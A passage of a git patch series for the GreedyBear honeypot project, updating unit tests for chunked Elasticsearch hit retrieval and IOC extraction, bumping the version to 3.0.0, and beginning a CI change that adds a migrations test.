- pipeline.elastic_repo.search.return_value = unknown_hits
+ pipeline.elastic_repo.search.return_value = [unknown_hits]
pipeline.ioc_repo.is_empty.return_value = False
pipeline.ioc_repo.is_ready_for_extraction.return_value = True
pipeline.ioc_repo.get_ioc_by_name.return_value = None
@@ -232,7 +232,7 @@ def test_mixed_honeypots_use_correct_strategies(self, mock_session_repo, mock_sc
}
),
]
- pipeline.elastic_repo.search.return_value = mixed_hits
+ pipeline.elastic_repo.search.return_value = [mixed_hits]
pipeline.ioc_repo.is_empty.return_value = False
pipeline.ioc_repo.is_ready_for_extraction.return_value = True
pipeline.ioc_repo.get_ioc_by_name.return_value = None
@@ -269,7 +269,7 @@ def test_strategy_exception_logged_and_continues(self, mock_scores):
}
),
]
- pipeline.elastic_repo.search.return_value = hits
+ pipeline.elastic_repo.search.return_value = [hits]
pipeline.ioc_repo.is_empty.return_value = False
pipeline.ioc_repo.is_ready_for_extraction.return_value = True
@@ -303,7 +303,7 @@ def test_scoring_called_when_iocs_extracted(self, mock_scores):
}
),
]
- pipeline.elastic_repo.search.return_value = hits
+ pipeline.elastic_repo.search.return_value = [hits]
pipeline.ioc_repo.is_empty.return_value = False
pipeline.ioc_repo.is_ready_for_extraction.return_value = True
pipeline.ioc_repo.get_ioc_by_name.return_value = None
@@ -357,7 +357,7 @@ def test_cowrie_ioc_content_verified(self, mock_scores):
}
),
]
- pipeline.elastic_repo.search.return_value = hits
+ pipeline.elastic_repo.search.return_value = [hits]
pipeline.ioc_repo.is_empty.return_value = False
pipeline.ioc_repo.is_ready_for_extraction.return_value = True
pipeline.ioc_repo.get_ioc_by_name.return_value = None
@@ -419,7 +419,7 @@ def test_multiple_honeypots_ioc_content_verified(self, mock_scores):
}
),
]
- pipeline.elastic_repo.search.return_value = hits
+ pipeline.elastic_repo.search.return_value = [hits]
pipeline.ioc_repo.is_empty.return_value = False
pipeline.ioc_repo.is_ready_for_extraction.return_value = True
pipeline.ioc_repo.get_ioc_by_name.return_value = None
@@ -478,7 +478,7 @@ def test_ioc_scanner_field_contains_honeypot_type(self, mock_scores):
}
),
]
- pipeline.elastic_repo.search.return_value = hits
+ pipeline.elastic_repo.search.return_value = [hits]
pipeline.ioc_repo.is_empty.return_value = False
pipeline.ioc_repo.is_ready_for_extraction.return_value = True
pipeline.ioc_repo.get_ioc_by_name.return_value = None
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_edge_cases.py b/tests/greedybear/cronjobs/test_extraction_pipeline_edge_cases.py
index c313f691..b9dcdbec 100644
--- a/tests/greedybear/cronjobs/test_extraction_pipeline_edge_cases.py
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_edge_cases.py
@@ -39,7 +39,7 @@ def test_partial_strategy_success(self, mock_factory, mock_scores):
MockElasticHit({"src_ip": "1.1.1.1", "type": "FailingHoneypot"}),
MockElasticHit({"src_ip": "2.2.2.2", "type": "SuccessHoneypot"}),
]
- pipeline.elastic_repo.search.return_value = hits
+ pipeline.elastic_repo.search.return_value = [hits]
pipeline.ioc_repo.is_empty.return_value = False
pipeline.ioc_repo.is_ready_for_extraction.return_value = True
@@ -85,7 +85,7 @@ def test_large_batch_of_hits_with_real_strategy(self, mock_scores):
)
for i in range(100)
]
- pipeline.elastic_repo.search.return_value = hits
+ pipeline.elastic_repo.search.return_value = [hits]
pipeline.ioc_repo.is_empty.return_value = False
pipeline.ioc_repo.is_ready_for_extraction.return_value = True
pipeline.ioc_repo.get_ioc_by_name.return_value = None
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_grouping.py b/tests/greedybear/cronjobs/test_extraction_pipeline_grouping.py
index 18eed9b3..c61e6346 100644
--- a/tests/greedybear/cronjobs/test_extraction_pipeline_grouping.py
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_grouping.py
@@ -34,9 +34,11 @@ def test_skips_hits_without_src_ip(self, mock_factory, mock_scores):
"""Hits without src_ip should be skipped."""
pipeline = self._create_pipeline_with_mocks()
pipeline.elastic_repo.search.return_value = [
- MockElasticHit({"type": "Cowrie"}), # missing src_ip
- MockElasticHit({"src_ip": "", "type": "Cowrie"}), # empty src_ip
- MockElasticHit({"src_ip": " ", "type": "Cowrie"}), # whitespace-only src_ip
+ [
+ MockElasticHit({"type": "Cowrie"}), # missing src_ip
+ MockElasticHit({"src_ip": "", "type": "Cowrie"}), # empty src_ip
+ MockElasticHit({"src_ip": " ", "type": "Cowrie"}), # whitespace-only src_ip
+ ]
]
pipeline.ioc_repo.is_empty.return_value = False
@@ -51,9 +53,11 @@ def test_skips_hits_without_type(self, mock_factory, mock_scores):
"""Hits without type (honeypot) should be skipped."""
pipeline = self._create_pipeline_with_mocks()
pipeline.elastic_repo.search.return_value = [
- MockElasticHit({"src_ip": "1.2.3.4"}), # missing type
- MockElasticHit({"src_ip": "1.2.3.4", "type": ""}), # empty type
- MockElasticHit({"src_ip": "1.2.3.4", "type": " "}), # whitespace-only type
+ [
+ MockElasticHit({"src_ip": "1.2.3.4"}), # missing type
+ MockElasticHit({"src_ip": "1.2.3.4", "type": ""}), # empty type
+ MockElasticHit({"src_ip": "1.2.3.4", "type": " "}), # whitespace-only type
+ ]
]
pipeline.ioc_repo.is_empty.return_value = False
@@ -80,7 +84,6 @@ def test_handles_empty_search_result(self, mock_factory, mock_scores):
class TestSensorExtraction(ExtractionPipelineTestCase):
"""Tests for sensor extraction from hits."""
- @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
@patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 10)
@patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
@patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
@@ -91,7 +94,7 @@ def test_extracts_sensor_from_hits(self, mock_factory, mock_scores):
"""
pipeline = self._create_pipeline_with_mocks()
pipeline.elastic_repo.search.return_value = [
- MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie", "t-pot_ip_ext": "10.0.0.1"}),
+ [MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie", "t-pot_ip_ext": "10.0.0.1"})],
]
pipeline.ioc_repo.is_empty.return_value = False
pipeline.ioc_repo.is_ready_for_extraction.return_value = False # Skip strategy for this test
@@ -120,7 +123,7 @@ def test_sensor_not_extracted_for_invalid_hits(self, mock_factory, mock_scores):
}
),
]
- pipeline.elastic_repo.search.return_value = hits
+ pipeline.elastic_repo.search.return_value = [hits]
pipeline.ioc_repo.is_empty.return_value = False
pipeline.execute()
@@ -138,9 +141,11 @@ def test_groups_hits_by_honeypot_type(self, mock_factory, mock_scores):
"""Hits should be grouped by honeypot type before extraction."""
pipeline = self._create_pipeline_with_mocks()
pipeline.elastic_repo.search.return_value = [
- MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
- MockElasticHit({"src_ip": "5.6.7.8", "type": "Cowrie"}),
- MockElasticHit({"src_ip": "9.10.11.12", "type": "Log4pot"}),
+ [
+ MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
+ MockElasticHit({"src_ip": "5.6.7.8", "type": "Cowrie"}),
+ MockElasticHit({"src_ip": "9.10.11.12", "type": "Log4pot"}),
+ ]
]
pipeline.ioc_repo.is_empty.return_value = False
pipeline.ioc_repo.is_ready_for_extraction.return_value = True
@@ -178,7 +183,7 @@ def test_duplicate_honeypot_hits_grouped(self, mock_factory, mock_scores):
MockElasticHit({"src_ip": "2.2.2.2", "type": "Cowrie"}),
MockElasticHit({"src_ip": "3.3.3.3", "type": "Cowrie"}),
]
- pipeline.elastic_repo.search.return_value = hits
+ pipeline.elastic_repo.search.return_value = [hits]
pipeline.ioc_repo.is_empty.return_value = False
pipeline.ioc_repo.is_ready_for_extraction.return_value = True
@@ -218,7 +223,7 @@ def test_honeypot_skipped_when_not_ready(self, mock_factory, mock_scores):
}
),
]
- pipeline.elastic_repo.search.return_value = hits
+ pipeline.elastic_repo.search.return_value = [hits]
pipeline.ioc_repo.is_empty.return_value = False
# First honeypot disabled, second enabled
@@ -234,3 +239,110 @@ def test_honeypot_skipped_when_not_ready(self, mock_factory, mock_scores):
self.assertEqual(result, 1)
# Factory should only be called once (for EnabledHoneypot)
mock_factory.return_value.get_strategy.assert_called_once_with("EnabledHoneypot")
+
+
+class TestMultiChunkProcessing(ExtractionPipelineTestCase):
+ """Tests for multi-chunk processing behavior."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_ioc_count_accumulated_across_chunks(self, mock_factory, mock_scores):
+ """IOC records from all chunks should be counted in the total."""
+ pipeline = self._create_pipeline_with_mocks()
+
+ chunk1 = [
+ MockElasticHit({"src_ip": "1.1.1.1", "type": "Cowrie"}),
+ MockElasticHit({"src_ip": "2.2.2.2", "type": "Cowrie"}),
+ ]
+ chunk2 = [
+ MockElasticHit({"src_ip": "3.3.3.3", "type": "Cowrie"}),
+ ]
+ chunk3 = [
+ MockElasticHit({"src_ip": "4.4.4.4", "type": "Cowrie"}),
+ MockElasticHit({"src_ip": "5.5.5.5", "type": "Cowrie"}),
+ MockElasticHit({"src_ip": "6.6.6.6", "type": "Cowrie"}),
+ ]
+ pipeline.elastic_repo.search.return_value = [chunk1, chunk2, chunk3]
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+ mock_strategy = MagicMock()
+ mock_strategy.ioc_records = []
+
+ def set_ioc_records(hits):
+ mock_strategy.ioc_records = [self._create_mock_ioc(h["src_ip"]) for h in hits]
+
+ mock_strategy.extract_from_hits.side_effect = set_ioc_records
+ mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+ result = pipeline.execute()
+
+ self.assertEqual(result, 6)
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_scoring_called_per_chunk(self, mock_factory, mock_scores):
+ """UpdateScores should be called once per chunk that produces IOCs."""
+ pipeline = self._create_pipeline_with_mocks()
+
+ chunk_with_hits = [
+ MockElasticHit({"src_ip": "1.1.1.1", "type": "Cowrie"}),
+ ]
+ empty_chunk = []
+ pipeline.elastic_repo.search.return_value = [
+ chunk_with_hits,
+ empty_chunk,
+ chunk_with_hits,
+ ]
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+ mock_strategy = MagicMock()
+ mock_strategy.ioc_records = [self._create_mock_ioc("1.1.1.1")]
+ mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+ pipeline.execute()
+
+ self.assertEqual(mock_scores.return_value.score_only.call_count, 2)
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_factory_created_once_across_chunks(self, mock_factory, mock_scores):
+ """ExtractionStrategyFactory should be instantiated once, not per chunk."""
+ pipeline = self._create_pipeline_with_mocks()
+
+ chunk = [MockElasticHit({"src_ip": "1.1.1.1", "type": "Cowrie"})]
+ pipeline.elastic_repo.search.return_value = [chunk, chunk, chunk]
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+ mock_strategy = MagicMock()
+ mock_strategy.ioc_records = []
+ mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+ pipeline.execute()
+
+ mock_factory.assert_called_once()
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_each_chunk_groups_hits_independently(self, mock_factory, mock_scores):
+ """Each chunk should group its own hits by honeypot type independently."""
+ pipeline = self._create_pipeline_with_mocks()
+
+ chunk1 = [MockElasticHit({"src_ip": "1.1.1.1", "type": "Cowrie"})]
+ chunk2 = [MockElasticHit({"src_ip": "2.2.2.2", "type": "Log4pot"})]
+ pipeline.elastic_repo.search.return_value = [chunk1, chunk2]
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+ mock_strategy = MagicMock()
+ mock_strategy.ioc_records = [self._create_mock_ioc()]
+ mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+ pipeline.execute()
+
+ calls = mock_factory.return_value.get_strategy.call_args_list
+ self.assertEqual(len(calls), 2)
+ self.assertEqual(calls[0][0][0], "Cowrie")
+ self.assertEqual(calls[1][0][0], "Log4pot")
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_init.py b/tests/greedybear/cronjobs/test_extraction_pipeline_init.py
index 18e81e60..9905454d 100644
--- a/tests/greedybear/cronjobs/test_extraction_pipeline_init.py
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_init.py
@@ -30,7 +30,6 @@ def test_initializes_repositories(self, mock_elastic, mock_ioc, mock_sensor):
class TestMinutesBackToLookup(ExtractionTestCase):
"""Tests for the _minutes_back_to_lookup property."""
- @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
@patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
@patch("greedybear.cronjobs.extraction.pipeline.INITIAL_EXTRACTION_TIMESPAN", 120)
@patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
@@ -47,7 +46,6 @@ def test_returns_initial_timespan_when_empty(self, mock_elastic, mock_ioc, mock_
self.assertEqual(result, 120)
- @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
@patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
@patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
@patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
@@ -62,19 +60,3 @@ def test_returns_extraction_interval_when_not_empty(self, mock_elastic, mock_ioc
result = pipeline._minutes_back_to_lookup
self.assertEqual(result, 5)
-
- @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", True)
- @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
- @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
- @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
- @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
- def test_returns_11_for_legacy_extraction(self, mock_elastic, mock_ioc, mock_sensor):
- """Should return 11 when LEGACY_EXTRACTION is enabled."""
- from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
-
- pipeline = ExtractionPipeline()
- pipeline.ioc_repo.is_empty.return_value = False
-
- result = pipeline._minutes_back_to_lookup
-
- self.assertEqual(result, 11)
diff --git a/tests/test_elastic_repository.py b/tests/test_elastic_repository.py
index 54cd92ea..04b8e92d 100644
--- a/tests/test_elastic_repository.py
+++ b/tests/test_elastic_repository.py
@@ -1,5 +1,5 @@
-from datetime import datetime
-from unittest.mock import Mock, patch
+from datetime import datetime, timedelta
+from unittest.mock import Mock, call, patch
from greedybear.cronjobs.repositories import ElasticRepository, get_time_window
@@ -18,38 +18,38 @@ def setUp(self):
self.repo = ElasticRepository()
+ @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
@patch("greedybear.cronjobs.repositories.elastic.Search")
- def test_has_honeypot_been_hit_returns_true_when_hits_exist(self, mock_search_class):
+ def test_has_honeypot_been_hit_returns_true_when_hits_exist(self, mock_search_class, mock_get_time_window):
mock_search = Mock()
mock_search_class.return_value = mock_search
- mock_q = Mock()
- with patch.object(self.repo, "_standard_query", return_value=mock_q):
- mock_search.query.return_value = mock_search
- mock_search.filter.return_value = mock_search
- mock_search.count.return_value = 1
-
- result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
- self.assertTrue(result)
- mock_search.query.assert_called_once_with(mock_q)
- mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
- mock_search.count.assert_called_once()
+ mock_search.query.return_value = mock_search
+ mock_search.filter.return_value = mock_search
+ mock_search.count.return_value = 1
+ mock_get_time_window.return_value = (datetime(2025, 1, 1), datetime(2025, 1, 1, 0, 10))
+ result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
+ self.assertTrue(result)
+ mock_search.query.assert_called_once()
+ mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
+ mock_search.count.assert_called_once()
+
+ @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
@patch("greedybear.cronjobs.repositories.elastic.Search")
- def test_has_honeypot_been_hit_returns_false_when_no_hits(self, mock_search_class):
+ def test_has_honeypot_been_hit_returns_false_when_no_hits(self, mock_search_class, mock_get_time_window):
mock_search = Mock()
mock_search_class.return_value = mock_search
- mock_q = Mock()
- with patch.object(self.repo, "_standard_query", return_value=mock_q):
- mock_search.query.return_value = mock_search
- mock_search.filter.return_value = mock_search
- mock_search.count.return_value = 0
+ mock_search.query.return_value = mock_search
+ mock_search.filter.return_value = mock_search
+ mock_search.count.return_value = 0
+ mock_get_time_window.return_value = (datetime(2025, 1, 1), datetime(2025, 1, 1, 0, 10))
- result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
+ result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
- self.assertFalse(result)
- mock_search.query.assert_called_once_with(mock_q)
- mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
- mock_search.count.assert_called_once()
+ self.assertFalse(result)
+ mock_search.query.assert_called_once()
+ mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
+ mock_search.count.assert_called_once()
def test_healthcheck_passes_when_ping_succeeds(self):
self.mock_client.ping.return_value = True
@@ -62,9 +62,9 @@ def test_healthcheck_raises_when_ping_fails(self):
self.repo._healthcheck()
self.assertIn("not reachable", str(ctx.exception))
+ @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
@patch("greedybear.cronjobs.repositories.elastic.Search")
- @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
- def test_search_returns_cached_list_not_generator(self, mock_search_class):
+ def test_search_yields_all_hits_across_chunks(self, mock_search_class, mock_get_time_window):
mock_search = Mock()
mock_search_class.return_value = mock_search
mock_search.query.return_value = mock_search
@@ -72,15 +72,15 @@ def test_search_returns_cached_list_not_generator(self, mock_search_class):
mock_hits = [{"name": f"hit{i}", "@timestamp": i} for i in range(20_000)]
mock_search.scan.return_value = iter(mock_hits)
+ mock_get_time_window.return_value = (datetime(2025, 1, 1, 12, 0), datetime(2025, 1, 1, 12, 10))
- first_iteration = list(self.repo.search(minutes_back_to_lookup=10))
- second_iteration = list(self.repo.search(minutes_back_to_lookup=10))
- self.assertEqual(len(first_iteration), 20_000)
- self.assertEqual(len(second_iteration), 20_000)
+ chunks = list(self.repo.search(minutes_back_to_lookup=10))
+ all_hits = [hit for chunk in chunks for hit in chunk]
+ self.assertEqual(len(all_hits), 20_000)
+ @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
@patch("greedybear.cronjobs.repositories.elastic.Search")
- @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
- def test_search_returns_ordered_list(self, mock_search_class):
+ def test_search_returns_ordered_hits_within_chunks(self, mock_search_class, mock_get_time_window):
mock_search = Mock()
mock_search_class.return_value = mock_search
mock_search.query.return_value = mock_search
@@ -88,58 +88,152 @@ def test_search_returns_ordered_list(self, mock_search_class):
mock_hits = [{"name": f"hit{i}", "@timestamp": i % 7} for i in range(20_000)]
mock_search.scan.return_value = iter(mock_hits)
+ mock_get_time_window.return_value = (datetime(2025, 1, 1, 12, 0), datetime(2025, 1, 1, 12, 10))
- result = list(self.repo.search(minutes_back_to_lookup=10))
- is_ordered = all(a["@timestamp"] <= b["@timestamp"] for a, b in zip(result, result[1:], strict=False))
- self.assertTrue(is_ordered)
+ chunks = list(self.repo.search(minutes_back_to_lookup=10))
+ for chunk in chunks:
+ is_ordered = all(a["@timestamp"] <= b["@timestamp"] for a, b in zip(chunk, chunk[1:], strict=False))
+ self.assertTrue(is_ordered)
@patch("greedybear.cronjobs.repositories.elastic.Search")
- @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", True)
- def test_search_legacy_mode_uses_relative_time(self, mock_search_class):
- """Test legacy extraction uses relative time queries"""
+ @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
+ def test_search_uses_time_window(self, mock_get_time_window, mock_search_class):
+ """Test extraction uses get_time_window"""
mock_search = Mock()
mock_search_class.return_value = mock_search
mock_search.query.return_value = mock_search
mock_search.source.return_value = mock_search
mock_search.scan.return_value = iter([])
- # Verify query was called (legacy mode uses different query structure)
- self.repo.search(minutes_back_to_lookup=11)
- mock_search.query.assert_called_once()
+ window_start = datetime(2025, 1, 1, 12, 0, 0)
+ window_end = datetime(2025, 1, 1, 12, 10, 0)
+ mock_get_time_window.return_value = (window_start, window_end)
+
+ list(self.repo.search(minutes_back_to_lookup=10))
+
+ mock_get_time_window.assert_called_once()
+
+
+class TestSearchChunking(CustomTestCase):
+ """Tests for the chunked iteration behavior of search()."""
+ def setUp(self):
+ self.mock_client = Mock()
+ self.mock_client.ping.return_value = True
+
+ patcher = patch("greedybear.cronjobs.repositories.elastic.settings")
+ self.mock_settings = patcher.start()
+ self.mock_settings.ELASTIC_CLIENT = self.mock_client
+ self.addCleanup(patcher.stop)
+
+ self.repo = ElasticRepository()
+
+ @patch("greedybear.cronjobs.repositories.elastic.EXTRACTION_INTERVAL", 10)
+ @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
@patch("greedybear.cronjobs.repositories.elastic.Search")
- @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
+ def test_produces_correct_number_of_chunks(self, mock_search_class, mock_get_time_window):
+ """A 30-minute window with 10-minute interval should yield 3 chunks."""
+ mock_search = Mock()
+ mock_search_class.return_value = mock_search
+ mock_search.query.return_value = mock_search
+ mock_search.source.return_value = mock_search
+ mock_search.scan.return_value = iter([])
+
+ mock_get_time_window.return_value = (
+ datetime(2025, 1, 1, 12, 0),
+ datetime(2025, 1, 1, 12, 30),
+ )
+
+ chunks = list(self.repo.search(minutes_back_to_lookup=30))
+
+ self.assertEqual(len(chunks), 3)
+
+ @patch("greedybear.cronjobs.repositories.elastic.EXTRACTION_INTERVAL", 10)
@patch("greedybear.cronjobs.repositories.elastic.get_time_window")
- def test_search_non_legacy_uses_time_window(self, mock_get_time_window, mock_search_class):
- """Test non-legacy extraction uses get_time_window"""
+ @patch("greedybear.cronjobs.repositories.elastic.Q")
+ @patch("greedybear.cronjobs.repositories.elastic.Search")
+ def test_chunk_boundaries_are_correct(self, mock_search_class, mock_q, mock_get_time_window):
+ """Each chunk should query the correct time range."""
mock_search = Mock()
mock_search_class.return_value = mock_search
mock_search.query.return_value = mock_search
mock_search.source.return_value = mock_search
mock_search.scan.return_value = iter([])
- window_start = datetime(2025, 1, 1, 12, 0, 0)
- window_end = datetime(2025, 1, 1, 12, 10, 0)
- mock_get_time_window.return_value = (window_start, window_end)
+ start = datetime(2025, 1, 1, 12, 0)
+ end = datetime(2025, 1, 1, 12, 30)
+ mock_get_time_window.return_value = (start, end)
- self.repo.search(minutes_back_to_lookup=10)
+ list(self.repo.search(minutes_back_to_lookup=30))
- mock_get_time_window.assert_called_once()
+ expected_calls = [
+ call("range", **{"@timestamp": {"gte": start, "lt": start + timedelta(minutes=10)}}),
+ call("range", **{"@timestamp": {"gte": start + timedelta(minutes=10), "lt": start + timedelta(minutes=20)}}),
+ call("range", **{"@timestamp": {"gte": start + timedelta(minutes=20), "lt": end}}),
+ ]
+ mock_q.assert_has_calls(expected_calls)
+ @patch("greedybear.cronjobs.repositories.elastic.EXTRACTION_INTERVAL", 10)
@patch("greedybear.cronjobs.repositories.elastic.get_time_window")
- @patch("greedybear.cronjobs.repositories.elastic.datetime")
- def test_standard_query_returns_correct_query(self, mock_datetime, mock_get_time_window):
- now = datetime(2023, 1, 1, 0, 0, 0)
- mock_datetime.now.return_value = now
- window_start = "2022-12-31T23:50:00"
- window_end = "2023-01-01T00:00:00"
- mock_get_time_window.return_value = (window_start, window_end)
+ @patch("greedybear.cronjobs.repositories.elastic.Search")
+ def test_equal_start_end_yields_no_chunks(self, mock_search_class, mock_get_time_window):
+ """When window_start == window_end, no chunks should be yielded."""
+ mock_search = Mock()
+ mock_search_class.return_value = mock_search
+
+ same_time = datetime(2025, 1, 1, 12, 0)
+ mock_get_time_window.return_value = (same_time, same_time)
+
+ chunks = list(self.repo.search(minutes_back_to_lookup=10))
+
+ self.assertEqual(chunks, [])
+ mock_search.scan.assert_not_called()
+
+ @patch("greedybear.cronjobs.repositories.elastic.EXTRACTION_INTERVAL", 10)
+ @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
+ @patch("greedybear.cronjobs.repositories.elastic.Search")
+ def test_healthcheck_called_once_for_multiple_chunks(self, mock_search_class, mock_get_time_window):
+ """Healthcheck should run once before chunking, not per chunk."""
+ mock_search = Mock()
+ mock_search_class.return_value = mock_search
+ mock_search.query.return_value = mock_search
+ mock_search.source.return_value = mock_search
+ mock_search.scan.return_value = iter([])
+
+ mock_get_time_window.return_value = (
+ datetime(2025, 1, 1, 12, 0),
+ datetime(2025, 1, 1, 12, 30),
+ )
+
+ list(self.repo.search(minutes_back_to_lookup=30))
+
+ self.mock_client.ping.assert_called_once()
+
+ @patch("greedybear.cronjobs.repositories.elastic.EXTRACTION_INTERVAL", 10)
+ @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
+ @patch("greedybear.cronjobs.repositories.elastic.Q")
+ @patch("greedybear.cronjobs.repositories.elastic.Search")
+ def test_last_chunk_shorter_when_not_divisible(self, mock_search_class, mock_q, mock_get_time_window):
+ """A 25-minute window with 10-minute interval should yield 3 chunks, the last covering only 5 minutes."""
+ mock_search = Mock()
+ mock_search_class.return_value = mock_search
+ mock_search.query.return_value = mock_search
+ mock_search.source.return_value = mock_search
+ mock_search.scan.return_value = iter([])
+
+ start = datetime(2025, 1, 1, 12, 0)
+ end = datetime(2025, 1, 1, 12, 25)
+ mock_get_time_window.return_value = (start, end)
- q = self.repo._standard_query(minutes_back_to_lookup=10)
+ chunks = list(self.repo.search(minutes_back_to_lookup=25))
- expected_dict = {"range": {"@timestamp": {"gte": window_start, "lt": window_end}}}
- self.assertEqual(q.to_dict(), expected_dict)
- mock_get_time_window.assert_called_once_with(now, 10)
+ self.assertEqual(len(chunks), 3)
+ expected_calls = [
+ call("range", **{"@timestamp": {"gte": start, "lt": start + timedelta(minutes=10)}}),
+ call("range", **{"@timestamp": {"gte": start + timedelta(minutes=10), "lt": start + timedelta(minutes=20)}}),
+ call("range", **{"@timestamp": {"gte": start + timedelta(minutes=20), "lt": end}}),
+ ]
+ mock_q.assert_has_calls(expected_calls)
class TestTimeWindowCalculation(CustomTestCase):
From b108c89798d8c5e1763a74ff10fbf1463fbf8e8f Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Mon, 2 Feb 2026 08:13:38 +0100
Subject: [PATCH 73/75] Bump 3.0.0
---
.env_template | 2 +-
docker/.version | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/.env_template b/.env_template
index 85c172c3..fb2e84a4 100644
--- a/.env_template
+++ b/.env_template
@@ -13,4 +13,4 @@ COMPOSE_FILE=docker/default.yml:docker/local.override.yml
#COMPOSE_FILE=docker/default.yml:docker/local.override.yml:docker/elasticsearch.yml
# If you want to run a specific version, populate this
-# REACT_APP_INTELOWL_VERSION="2.1.0"
+# REACT_APP_INTELOWL_VERSION="3.0.0"
diff --git a/docker/.version b/docker/.version
index f32f3526..37ece384 100644
--- a/docker/.version
+++ b/docker/.version
@@ -1 +1 @@
-REACT_APP_GREEDYBEAR_VERSION="2.1.0"
\ No newline at end of file
+REACT_APP_GREEDYBEAR_VERSION="3.0.0"
\ No newline at end of file
From e2fc8799b48d9a43f101d35e8fb3b01d2db9bb63 Mon Sep 17 00:00:00 2001
From: Dorna Raj Gyawali
Date: Tue, 3 Feb 2026 16:02:23 +0545
Subject: [PATCH 74/75] test(migrations): add migrations test . closes #746
(#753)
* test(migrations): add migrations test
* resolve linter issue
* make CI use requirements-dev.txt and remove redundant coverage entry
* refactor/add testcase
* remove code snippet
* add test_runner & update migration test flow
* run migration tests in CI
---------
Co-authored-by: tim <46972822+regulartim@users.noreply.github.com>
---
.../create_dev_requirements_file/action.yml | 8 +-
.github/workflows/_python.yml | 6 +-
.github/workflows/pull_request_automation.yml | 3 +
greedybear/settings.py | 3 +
requirements/dev-requirements.txt | 1 +
tests/__init__.py | 25 +++++-
tests/test_migrations.py | 76 +++++++++++++++++++
tests/test_runner.py | 25 ++++++
8 files changed, 138 insertions(+), 9 deletions(-)
create mode 100644 tests/test_migrations.py
create mode 100644 tests/test_runner.py
diff --git a/.github/actions/python_requirements/create_dev_requirements_file/action.yml b/.github/actions/python_requirements/create_dev_requirements_file/action.yml
index eb86a046..b11c58f2 100644
--- a/.github/actions/python_requirements/create_dev_requirements_file/action.yml
+++ b/.github/actions/python_requirements/create_dev_requirements_file/action.yml
@@ -8,9 +8,6 @@ inputs:
project_dev_requirements_file:
description: An additional project dev requirements file
required: false
- use_coverage:
- description: Use coverage.py
- required: false
runs:
using: "composite"
@@ -18,10 +15,7 @@ runs:
- name: Create requirements-dev.txt
run: |
echo > requirements-dev.txt
- if [[ '${{ inputs.use_coverage }}' != 'false' ]]; then
- echo "coverage>=7.3.2" >> requirements-dev.txt
- fi
